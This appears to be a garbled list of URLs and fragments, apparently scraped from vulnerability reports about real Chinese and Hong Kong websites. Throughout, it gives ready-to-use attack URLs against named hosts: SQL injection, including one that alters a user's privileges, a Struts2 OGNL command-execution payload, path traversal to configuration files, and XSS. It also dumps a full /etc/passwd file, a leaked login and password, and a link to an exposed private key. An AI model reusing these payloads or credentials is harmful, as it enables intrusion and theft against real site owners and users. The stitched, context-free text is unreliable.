https://sslvpn.ganji.com/v5/search/,DanaInfo=audit.corp.ganji.com+index.aspx?querytype=6&content=9634102073865117298510&categoryscript=15 http://m.xywy.com/Ig/Index/ajaxPart?is_man=1&part_id=13 http://**.**.**.**/publish.php?Type=&Board_No=28 http://nydl.hit.edu.cn/test/admin/index.asp http://**.**.**.**/list.aspx?stid=5882 http://**.**.**.**/special/2013/sbjszqh/list.aspx?stid=5446&pageid=2 http://**.**.**.**/List.aspx?stid=5781 http://**.**.**.**/quxian/List.aspx?AreaInfoID=119 http://**.**.**.**/pinggu/result.aspx?id=1051 http://**.**.**.**/list.aspx?stid=6041 http://**.**.**.**/list.aspx?stid=6041 http://**.**.**.** http://pgxt.gree.com:7909/hjzx/zzbx/bx.jsp http://**.**.**.**/cn/article.php?id=97 http://**.**.**.**/wwwroot.rar http://www.showcai.com.cn/dwzq_front/index/indexInfo http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile= www.showcai.com.cn http://**.**.**/ http://**.**.**/uddiexplorer/wooyun.jsp http://bbs.crsky.com/thread_sort.php?fid=264&startdate=2015-09-01&enddate=2015-09-26&search=currmon&order=author http://**.**.**.** http://**.**.**.**/include/one_pic.asp?acc_no=1500 http://**.**.**.**/include/one_pic.asp?acc_no=222修改这里的ID数据 http://**.**.**.**/check_user.asp?DepartNo=001000000000 http://**.**.**.**/append_attach.asp?DepartNo=001000000000 http://**.**.**.**/include/show_img.asp?acc_no=1500 http://**.**.**.**/include/one_pic.asp?acc_no=1500 http://**.**.**.**/include/show_img.asp http://**.**.**.**/queren_bx.aspx?d_id=521 http://**.**.**.**/queren_bx.aspx?d_id=520 http://**.**.**.**/pay.aspx?d_id=526 http://**.**.**.**/pay.aspx?d_id=528 http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.** http://api.1hai.cn/ http://www.uimaker.com/designer.php?zy=Flash%B6%AF%BB%AD http://www.essrc.fudan.edu.cn/newsdetail.php?pid=27 http://**.**.**.**/ http://**.**.**.**/mallPortal/ http://**.**.**.** http://**.**.**.**/content/16481 http://**.**.**.**/pages/jsp/copartner/main.jsp http://wap.tigerknows.com/.svn/entries http://news.hitsz.edu.cn/2008.php http://**.**.**.**/newsDetail.php?nid=1596 http://**.**.**.**/newsDetail.php?nid=1596%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT%280x717a6b7871,user%28%29,version%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- http://**.**.**.**/Index-payment-id-10002.html)可通过修改ID为其他任意5位数字查看其他消费者的电话及详细地址,造成隐私泄露。 http://**.**.**.**/efroip/public/chatroom/index.php?cid=1 http://61.142.114.201/ http://61.142.114.203/ http://61.142.114.204/ http://61.142.114.205/ http://61.142.114.197/ http://61.142.114.199/ http://q.yiban.cn/ http://**.**.**.**/news_list.aspx?page=1&news_name=&sorttype= https://github.com/y-h-s/weixin/blob/746cdc510977d7655622c41ae1d7aa5cdddaf758/SpringmvcTest/src/main/resources/mail.properties http://2345.trip8080.com/.svn/entries http://51.trip8080.com/.svn/entries http://mail.cn-healthcare.com/ http://119.254.70.180/ http://wooyun.org/bugs/wooyun-2015-0106070 http://**.**.**.**/ http://**.**.**.**/robots.txt/.php http://**.**.**.**/admin/index.php http://**.**.**.**/phpMyAdmin/setup/sg.php http://**.**.**.**/hkhxg.aspx http://113.106.86.133:800/login/Login.jsp?logintype=1 http://113.106.86.133:800//messager/users.data URL:http://**.**.**.**/Rsdl/dacx.aspx http://**.**.**.**/download?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../bin/bash http://**.**.**.**/download?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../bin/sync http://img.weipai.cn/.svn/entries http://**.**.**.**/ http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://oss.cmge.com/config.jsp encap:Ethernet F8:BC:12:4A:AB:0C addr:123.59.73.98 Bcast:123.59.73.111 Mask:255.255.255.240 fabc:12ff:fe4a:ab0c/64 Scope:Link MTU:1500 packets:234690100 packets:191975833 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/console http://**.**.**.**/.git/config http://121.43.145.89/login.html http://sz.breadtrip.com http://222.73.63.161/login.php http://web.breadtrip.com/trips/2387105525 http://**.**.**.**:80/ http://**.**.**.**/discuz/space/?uid=3155 http://broker2.esf.leju.com/statnew/agentreal http://jxj.uestc.edu.cn/Data/resource/backupdata/ http://cemlab.uestc.edu.cn/admin/Session.asp http://xgb.uestc.edu.cn/admin/editor.php http://jxdz.uestc.edu.cn/kindeditor/php/demo.php http://arn.uestc.edu.cn/ckfinder/ckfinder.html http://gfc.twhg.com.tw/top_global_news_b.php?id=36116 http://zchq.cuc.edu.cn/home/StudentHome?Student_Name=1&Student_IDnumber=1 http://61.158.56.15:7001/logonAction.do http://61.158.56.15:7001//b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://61.158.56.15:7001/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&down http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://www.wszyjy.sdu.edu.cn/old_version/ http://www.wszyjy.sdu.edu.cn/old_version/upload/wwws.rar http://wap.haoshouwang.com/phone_nanny/model?brand=1 http://log.yifangyun.com:8080/#/dashboard/file/default.json http://ads.roowei.com/.svn/entries http://ph.roowei.com/.svn/entries http://mail.v1.cn/ http://zone.wooyun.org/content/23175 http://pay.g.v1.cn/Z8Ex1iB5/adminLogin http://mp.weixin.qq.com http://cms.diyicai.com/cms/太多弱口令 http://192.168.9.105/ http://192.168.9.105/index.php?ctl=deals&k= http://192.168.9.105/index.php?ctl=deals&k= http://cms.v1cn/ http://221.123.177.63:8086/index.jsp http://www.pumo.com.tw/gb/index.jsp?id=aac4344c33d6f853b3c8a3366f0f1d8d http://**.**.**.**/news/index.do www.zoomeye.org里面搜索: country:China http://map.iyiyun.com随便发布一个地图 http://map.iyiyun.com/Index/infoDetail/id/21513 http://211.160.9.92:7002/ http://211.160.9.92:7002/console/login/LoginForm.jsp user:zhangll pwd:123456 http://ser.foxconn.com/,查看其网页源代码,可看到存在以下js: http://t.womaiapp.com http://**.**.**.**/giftDetail.jsp?giftId=402 http://**.**.**.**/hqglxxxt/Manage/Calendar/FileDown.aspx?id=10012%20AND%201=2%20--%20 http://faq.cetools.cn/采用了中企动力的门户CMS,该cms存在通用的sql注入漏洞, http://**.**.**.**/bugs/wooyun-2015-0150768 http://api.droid4x.cn/ http://**.**.**.**/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 http://**.**.**.**//space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 http://**.**.**.**/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=2745644%20where%20username=%27%27QQ4856955%27%27%27%29-- http://hd.dwzq.com.cn:2168/ajax/ajaxhandle.ashx?act=checkuser&username=test1[注入点]&t=0.523551341611892 http://**.**.**.** http://**.**.**.**/download.php?file=../../../public_html/download.php http://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.php http://**.**.**.**/ http://**.**.**.**/download.php?fdoc=download.php http://**.**.**.**/download.php?fdoc=index.php http://**.**.**.**/download.php?fdoc=index_c.php http://**.**.**.**/download.php?fdoc=v_index.php http://**.**.**.** http://**.**.**.**/download.php?file=../../public_html/download.php http://**.**.**.**/download.php?file=../../public_html/conn.php http://**.**.**.**/download.php?file=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin diradmin:x:101:104::/usr/local/directadmin:/bin/false mysql:x:102:105:MySQL server:/var/lib/mysql:/bin/false webapps:x:500:500::/var/www/html:/bin/false majordomo:x:103:2::/etc/virtual/majordomo:/bin/false dovecot:x:104:106::/home/dovecot:/bin/false admin:x:501:501::/home/admin:/bin/bash clamav:x:502:502:Clam AntiVirus:/home/clamav:/bin/false evitationn:x:504:504::/home/evitationn:/bin/false nelsonlam:x:506:506::/home/nelsonlam:/bin/false petsfans:x:507:507::/home/petsfans:/bin/false wacecom:x:508:508::/home/wacecom:/bin/false hkctr:x:510:510::/home/hkctr:/bin/false a06outdoor:x:511:511::/home/a06outdoor:/bin/false a259dogcom:x:512:512::/home/a259dogcom:/bin/false a4lumcom:x:514:514::/home/a4lumcom:/bin/false a602sqnorg:x:515:515::/home/a602sqnorg:/bin/false a810hk:x:516:516::/home/a810hk:/bin/false a89268com:x:517:517::/home/a89268com:/bin/false aaronkwanc:x:518:518::/home/aaronkwanc:/bin/false affinityhk:x:520:520::/home/affinityhk:/bin/false agiyam:x:521:521::/home/agiyam:/bin/false ahbunnetdd:x:522:522::/home/ahbunnetdd:/bin/false aisuinfo86:x:523:523::/home/aisuinfo86:/bin/false alliancepl:x:525:525::/home/alliancepl:/bin/false alnidvhked:x:526:526::/home/alnidvhked:/bin/false alphaomega:x:527:527::/home/alphaomega:/bin/false alucoicomb:x:528:528::/home/alucoicomb:/bin/false amahk:x:529:529::/home/amahk:/bin/false angelawong:x:530:530::/home/angelawong:/bin/false assetcomhk:x:532:532::/home/assetcomhk:/bin/false awingsstor:x:533:533::/home/awingsstor:/bin/false azoniconce:x:535:535::/home/azoniconce:/bin/false bandrmcom7:x:539:539::/home/bandrmcom7:/bin/false batsaxcomd:x:540:540::/home/batsaxcomd:/bin/false bhjsalumni:x:543:543::/home/bhjsalumni:/bin/false bunnyspace:x:546:546::/home/bunnyspace:/bin/false cardlandhk:x:547:547::/home/cardlandhk:/bin/false cdpchkcom4:x:550:550::/home/cdpchkcom4:/bin/false chuenoucom:x:552:552::/home/chuenoucom:/bin/false coinshk:x:555:555::/home/coinshk:/bin/false computerex:x:556:556::/home/computerex:/bin/false cpchkcom77:x:557:557::/home/cpchkcom77:/bin/false csklcomhk7:x:558:558::/home/csklcomhk7:/bin/false cydhk7eb:x:561:561::/home/cydhk7eb:/bin/false daisymaris:x:562:562::/home/daisymaris:/bin/false derektam:x:564:564::/home/derektam:/bin/false dfshipcom:x:565:565::/home/dfshipcom:/bin/false directprin:x:566:566::/home/directprin:/bin/false dirtbikehk:x:567:567::/home/dirtbikehk:/bin/false dorothytsu:x:568:568::/home/dorothytsu:/bin/false dphkcom:x:569:569::/home/dphkcom:/bin/false easybidjap:x:570:570::/home/easybidjap:/bin/false eottravelc:x:576:576::/home/eottravelc:/bin/false euroasiatr:x:577:577::/home/euroasiatr:/bin/false exoprocomh:x:578:578::/home/exoprocomh:/bin/false firstricho:x:581:581::/home/firstricho:/bin/false focallingc:x:582:582::/home/focallingc:/bin/false frankieche:x:583:583::/home/frankieche:/bin/false freetradeh:x:585:585::/home/freetradeh:/bin/false fuhingnetc:x:586:586::/home/fuhingnetc:/bin/false funfunhome:x:587:587::/home/funfunhome:/bin/false fwicomhka6:x:589:589::/home/fwicomhka6:/bin/false fwlcoscom8:x:590:590::/home/fwlcoscom8:/bin/false gallerycar:x:591:591::/home/gallerycar:/bin/false generalsma:x:592:592::/home/generalsma:/bin/false giftattack:x:593:593::/home/giftattack:/bin/false glamourppc:x:594:594::/home/glamourppc:/bin/false goghproduc:x:596:596::/home/goghproduc:/bin/false greaterchi:x:597:597::/home/greaterchi:/bin/false hkacmcomhk:x:600:600::/home/hkacmcomhk:/bin/false hkcagcom6f:x:601:601::/home/hkcagcom6f:/bin/false hkcqbcom0a:x:602:602::/home/hkcqbcom0a:/bin/false hkjcstaffc:x:603:603::/home/hkjcstaffc:/bin/false hkparentsc:x:605:605::/home/hkparentsc:/bin/false hksupreme2:x:606:606::/home/hksupreme2:/bin/false hnhhkcom85:x:607:607::/home/hnhhkcom85:/bin/false househknet:x:610:610::/home/househknet:/bin/false hoyincoma6:x:612:612::/home/hoyincoma6:/bin/false hvaahk945:x:613:613::/home/hvaahk945:/bin/false icecreamus:x:614:614::/home/icecreamus:/bin/false iceocomhkf:x:615:615::/home/iceocomhkf:/bin/false ichinghkad:x:616:616::/home/ichinghkad:/bin/false idphkea8:x:617:617::/home/idphkea8:/bin/false indopacres:x:620:620::/home/indopacres:/bin/false isohkcom13:x:623:623::/home/isohkcom13:/bin/false johnsonspo:x:626:626::/home/johnsonspo:/bin/false kagostudio:x:628:628::/home/kagostudio:/bin/false keenscomhk:x:629:629::/home/keenscomhk:/bin/false keyhouseco:x:630:630::/home/keyhouseco:/bin/false kinsonstud:x:632:632::/home/kinsonstud:/bin/false kitkwongco:x:633:633::/home/kitkwongco:/bin/false kobonetcom:x:634:634::/home/kobonetcom:/bin/false kpcomhke15:x:635:635::/home/kpcomhke15:/bin/false lamto396:x:636:636::/home/lamto396:/bin/false lanaturalb:x:638:638::/home/lanaturalb:/bin/false laplamnet5:x:639:639::/home/laplamnet5:/bin/false leechengin:x:640:640::/home/leechengin:/bin/false leechk766:x:641:641::/home/leechk766:/bin/false leonhartin:x:642:642::/home/leonhartin:/bin/false leotpsorg3:x:643:643::/home/leotpsorg3:/bin/false liberohkco:x:644:644::/home/liberohkco:/bin/false locusdesig:x:645:645::/home/locusdesig:/bin/false lpcorghk86:x:646:646::/home/lpcorghk86:/bin/false lstcymck:x:647:647::/home/lstcymck:/bin/false lujahgroup:x:649:649::/home/lujahgroup:/bin/false macaopeopl:x:650:650::/home/macaopeopl:/bin/false macaovoice:x:651:651::/home/macaovoice:/bin/false mafaidesig:x:652:652::/home/mafaidesig:/bin/false magicpoint:x:653:653::/home/magicpoint:/bin/false maxngnetb4:x:654:654::/home/maxngnetb4:/bin/false mayseecomh:x:655:655::/home/mayseecomh:/bin/false milestonec:x:657:657::/home/milestonec:/bin/false mmagicorga:x:659:659::/home/mmagicorga:/bin/false moonspirit:x:661:661::/home/moonspirit:/bin/false mulanhauco:x:662:662::/home/mulanhauco:/bin/false mychairs:x:663:663::/home/mychairs:/bin/false myroomzero:x:665:665::/home/myroomzero:/bin/false neureuterc:x:669:669::/home/neureuterc:/bin/false ngchikitco:x:670:670::/home/ngchikitco:/bin/false ocom8d6:x:672:672::/home/ocom8d6:/bin/false paperhse:x:675:675::/home/paperhse:/bin/false pazucomd00:x:676:676::/home/pazucomd00:/bin/false pennychann:x:677:677::/home/pennychann:/bin/false poshpawsco:x:680:680::/home/poshpawsco:/bin/false qooooocom:x:681:681::/home/qooooocom:/bin/false quartsnet3:x:682:682::/home/quartsnet3:/bin/false rainbowcar:x:683:683::/home/rainbowcar:/bin/false recyclemsc:x:684:684::/home/recyclemsc:/bin/false redsoundco:x:685:685::/home/redsoundco:/bin/false righttimec:x:688:688::/home/righttimec:/bin/false ripabharma:x:689:689::/home/ripabharma:/bin/false rm204comc5:x:690:690::/home/rm204comc5:/bin/false ronaldchen:x:691:691::/home/ronaldchen:/bin/false rwowcomd21:x:693:693::/home/rwowcomd21:/bin/false sdsccomhka:x:695:695::/home/sdsccomhka:/bin/false shoppingth:x:696:696::/home/shoppingth:/bin/false sqkhkabd:x:697:697::/home/sqkhkabd:/bin/false starhscom0:x:698:698::/home/starhscom0:/bin/false starmaxsta:x:699:699::/home/starmaxsta:/bin/false straightco:x:701:701::/home/straightco:/bin/false successpac:x:702:702::/home/successpac:/bin/false takhoineta:x:705:705::/home/takhoineta:/bin/false tdeccomhka:x:706:706::/home/tdeccomhka:/bin/false teamacaune:x:707:707::/home/teamacaune:/bin/false tefohkd01:x:708:708::/home/tefohkd01:/bin/false tinwannewt:x:710:710::/home/tinwannewt:/bin/false tradefirst:x:713:713::/home/tradefirst:/bin/false ueihkcom:x:715:715::/home/ueihkcom:/bin/false uniquemaca:x:716:716::/home/uniquemaca:/bin/false vincentchi:x:718:718::/home/vincentchi:/bin/false vitascomhk:x:719:719::/home/vitascomhk:/bin/false weightron:x:721:721::/home/weightron:/bin/false winstonlau:x:722:722::/home/winstonlau:/bin/false wisecarehe:x:724:724::/home/wisecarehe:/bin/false wyxhkfansc:x:727:727::/home/wyxhkfansc:/bin/false ychzcorghk:x:731:731::/home/ychzcorghk:/bin/false yglhkcom17:x:732:732::/home/yglhkcom17:/bin/false ywyancom22:x:734:734::/home/ywyancom22:/bin/false lowb:x:756:756::/home/lowb:/bin/false offside:x:757:757::/home/offside:/bin/false hkctr1:x:768:768::/home/hkctr1:/bin/false gigilam:x:786:786::/home/gigilam:/bin/false ishop1314:x:787:787::/home/ishop1314:/bin/false jojolam:x:788:788::/home/jojolam:/bin/false mschk:x:789:789::/home/mschk:/bin/false ttgin:x:792:792::/home/ttgin:/bin/false unitedadv:x:797:797::/home/unitedadv:/bin/false carsonrack:x:799:799::/home/carsonrack:/bin/false easytech:x:801:801::/home/easytech:/bin/false printeasy:x:807:807::/home/printeasy:/bin/false tinkee:x:808:808::/home/tinkee:/bin/false wace:x:809:809::/home/wace:/bin/false elastiquec:x:814:814::/home/elastiquec:/bin/false citylinkco:x:835:835::/home/citylinkco:/bin/false c9hk:x:840:840::/home/c9hk:/bin/false webdesigne:x:843:843::/home/webdesigne:/bin/false bmwines:x:857:857::/home/bmwines:/bin/false hair163:x:888:888::/home/hair163:/bin/false metta:x:916:916::/home/metta:/bin/false nelson:x:921:921::/home/nelson:/bin/false nomeahk:x:922:922::/home/nomeahk:/bin/false nomeaus:x:924:924::/home/nomeaus:/bin/false nomeawatch:x:925:925::/home/nomeawatch:/bin/false phg:x:929:929::/home/phg:/bin/false pyjewelry:x:931:931::/home/pyjewelry:/bin/false readerfanc:x:932:932::/home/readerfanc:/bin/false splendid:x:948:948::/home/splendid:/bin/false steveso1:x:949:949::/home/steveso1:/bin/false steveso2:x:950:950::/home/steveso2:/bin/false steveso3:x:951:951::/home/steveso3:/bin/false touchup:x:955:955::/home/touchup:/bin/false tours:x:956:956::/home/tours:/bin/false ultim8:x:957:957::/home/ultim8:/bin/false usagi:x:958:958::/home/usagi:/bin/false wintex:x:966:966::/home/wintex:/bin/false onlinshop1:x:979:979::/home/onlinshop1:/bin/false onlinshop2:x:982:982::/home/onlinshop2:/bin/false onlinshop4:x:984:984::/home/onlinshop4:/bin/false onlinshop5:x:985:985::/home/onlinshop5:/bin/false poman:x:988:988::/home/poman:/bin/false ricochet:x:989:989::/home/ricochet:/bin/false zemingtea:x:992:992::/home/zemingtea:/bin/false living:x:994:994::/home/living:/bin/false mah:x:996:996::/home/mah:/bin/false soh:x:997:997::/home/soh:/bin/false hair163seo:x:1014:1014::/home/hair163seo:/bin/false moneyworth:x:1026:1026::/home/moneyworth:/bin/false music:x:1027:1027::/home/music:/bin/false nomeaccohk:x:1028:1028::/home/nomeaccohk:/bin/false pulsefitne:x:1029:1029::/home/pulsefitne:/bin/false reducefatc:x:1030:1030::/home/reducefatc:/bin/false seeinart:x:1031:1031::/home/seeinart:/bin/false shapebody:x:1032:1032::/home/shapebody:/bin/false shipping:x:1033:1033::/home/shipping:/bin/false sunflower:x:1034:1034::/home/sunflower:/bin/false tcmakeup:x:1035:1035::/home/tcmakeup:/bin/false virtoffice:x:1036:1036::/home/virtoffice:/bin/false nomoresing:x:1042:1042::/home/nomoresing:/bin/false pvbc2:x:1043:1043::/home/pvbc2:/bin/false webdesigtc:x:1046:1046::/home/webdesigtc:/bin/false theboard:x:1048:1048::/home/theboard:/bin/false lotchware:x:1052:1052::/home/lotchware:/bin/false lotchsuppl:x:1053:1053::/home/lotchsuppl:/bin/false victorps:x:1054:1054::/home/victorps:/bin/false jafoon:x:1059:1059::/home/jafoon:/bin/false cacenter:x:1061:1061::/home/cacenter:/bin/false hos:x:1071:1071::/home/hos:/bin/false grandhealt:x:1078:1078::/home/grandhealt:/bin/false businesspl:x:1079:1079::/home/businesspl:/bin/false campbell:x:1094:1094::/home/campbell:/bin/false ecohome:x:1095:1095::/home/ecohome:/bin/false lifecomm:x:1098:1098::/home/lifecomm:/bin/false webdesign:x:1101:1101::/home/webdesign:/bin/false onetechhkc:x:1105:1105::/home/onetechhkc:/bin/false buybusines:x:1115:1115::/home/buybusines:/bin/false movectr2:x:1119:1119::/home/movectr2:/bin/false jacson:x:1132:1132::/home/jacson:/bin/false violin:x:1138:1138::/home/violin:/bin/false greylistd:x:105:107:Greylisting deamon:/var/lib/greylistd:/sbin/nologin onetech:x:1151:1151::/home/onetech:/bin/false forsyth:x:1152:1152::/home/forsyth:/bin/false edendiscus:x:1154:1154::/home/edendiscus:/bin/false gianttesti:x:1157:1157::/home/gianttesti:/bin/false chrishum:x:1158:1158::/home/chrishum:/bin/false food:x:1166:1166::/home/food:/bin/false mffont:x:1177:1177::/home/mffont:/bin/false kinson:x:1178:1178::/home/kinson:/bin/false tkdsystem:x:1179:1179::/home/tkdsystem:/bin/false orionarm:x:1180:1180::/home/orionarm:/bin/false espuma:x:1181:1181::/home/espuma:/bin/false edtkd:x:1182:1182::/home/edtkd:/bin/false cvtower:x:1183:1183::/home/cvtower:/bin/false tamuta:x:1185:1185::/home/tamuta:/bin/false everhonor:x:1186:1186::/home/everhonor:/bin/false shooting5:x:1189:1189::/home/shooting5:/bin/false ball3:x:1191:1191::/home/ball3:/bin/false debts:x:1194:1194::/home/debts:/bin/false neoprohk:x:1195:1195::/home/neoprohk:/bin/false tamodacom:x:1196:1196::/home/tamodacom:/bin/false mental123:x:1197:1197::/home/mental123:/bin/false swgaeashop:x:1198:1198::/home/swgaeashop:/bin/false hangfunghk:x:1199:1199::/home/hangfunghk:/bin/false xmarket:x:1202:1202::/home/xmarket:/bin/false eeemotion:x:1203:1203::/home/eeemotion:/bin/false hkctrcc:x:1205:1205::/home/hkctrcc:/bin/false cashflow:x:1206:1206::/home/cashflow:/bin/false gkts:x:1207:1207::/home/gkts:/bin/false ef7com:x:1208:1208::/home/ef7com:/bin/false hkahhk:x:1209:1209::/home/hkahhk:/bin/false hkaheng:x:1211:1211::/home/hkaheng:/bin/false snuface:x:1212:1212::/home/snuface:/bin/false mah123:x:1213:1213::/home/mah123:/bin/false foster:x:1215:1215::/home/foster:/bin/false justbcom:x:1218:1218::/home/justbcom:/bin/false maheng:x:1219:1219::/home/maheng:/bin/false pmca:x:1221:1221::/home/pmca:/bin/false clubleague:x:1222:1222::/home/clubleague:/bin/false successmkt:x:1224:1224::/home/successmkt:/bin/false zzsoncom:x:1226:1226::/home/zzsoncom:/bin/false embactr:x:1227:1227::/home/embactr:/bin/false nsconcept:x:1229:1229::/home/nsconcept:/bin/false hk5gctr:x:1230:1230::/home/hk5gctr:/bin/false hk5gcom:x:1231:1231::/home/hk5gcom:/bin/false eshop:x:1232:1232::/home/eshop:/bin/false femcaremed:x:1233:1233::/home/femcaremed:/bin/false test1:x:1234:1234::/home/test1:/bin/false https://**.**.**.**/exploits/39033/)执行php反弹shell命令: http://**.**.**.**:9001/ http://**.**.**.**:9001/jmx-console/ http://**.**.**.**:9001/payload/ http://**.**.**.**:9001/test/ http://**.**.**.**/info_page.jsp?plmjc=zgpdw http://**.**.**.**/qywh.jsp?plmjc=qywh http://**.**.**.**/zt_page.jsp?lmmc=zt_ddby http://**.**.**.**/info_page.jsp?plmjc=zgpdw http://**.**.**.**/manager/ http://**.**.**.**/news.rar http://**.**.**.**/1.zip http://**.**.**.**/2.php http://ftx.bai.sohu.com/bcastr.swf?bcastr_xml_url=xml/bcastr_v1.xml http://bai.sohu.com/app/forum/list/index.do?discussion=201#/app/forum/post/index.do?discussion=201&subject=456647 http://bai.sohu.com/app/forum/list/index.do?discussion=201#/app/forum/post/index.do?discussion=201&subject=456680 http://ftxbasketball.blog.sohu.com/ http://bai.sohu.com/app/forum/list/index.do?discussion=201 http://**.**.**.**/admin/login.asp http://**.**.**.**/ URL:http://www.hcznb.com/ https://www.hcznb.com/forget.html http://cloud.letv.com/note http://s3.lecloud.com/27801582-noteshare/39a9a328-ceb3-40c3-bd86-3c7336645889 http://**.**.**.**/hot_news01.asp?id=300 http://**.**.**.**:8088/hecprod/ http://i.apps.v1.cn/cs/app/Querynewversion.html http://www.scyd360.com/product.php http://**.**.**.**/bugs/wooyun-2015-0122523 http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://cms.s.the9.com/Index/index http://www.100credit.com/kind.php?k=1&id=48%20and%201=1-- http://www.100credit.com/kind.php?k=4&s=2&id=85&pid=51 url:http://r.m.baidu.com/%3Cimg%20src=x%20onerror=alert%28domain%29%3E http://**.**.**.**/employer/showdetail.aspx?id=291932 http://**.**.**.**/suzhoubaweb/show/sj/ImgServlet?id= http://www.chinahr.com http://passport.chinahr.com/pc/findPwd http://**.**.**.**/laodong/index.asp http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/118.pic_hd_%E5%8C%97%E4%BA%AC%E4%BA%BA20111441708756.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/55555_zhenxin3601433995977.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/mini%E6%96%B0%E7%9A%84%E5%BC%80%E5%8F%91%E5%95%86%E8%90%A5%E4%B8%9A%E6%89%A7%E7%85%A7%E6%89%AB%E6%8F%8F%E4%BB%B6_GPc3772105731448092534.jpg http://www.mtmos.com/v1/mss_5b79eadbac274c9b90c57eab23c92533/ticket/a/id_rsa_ZKt6602240841449111282.txt http://www.iqegg.com www.iqegg.com http://**.**.**.**/promotions_show.asp?id=244存在注入漏洞 http://**.**.**.**/manage/AdminLogin.asp http://qz6666.com/4.html http://www.21cake.com/passport-login.html这个是主站登录的地方,一开始没有验证码,出错一定次数之后就出来了验证码: 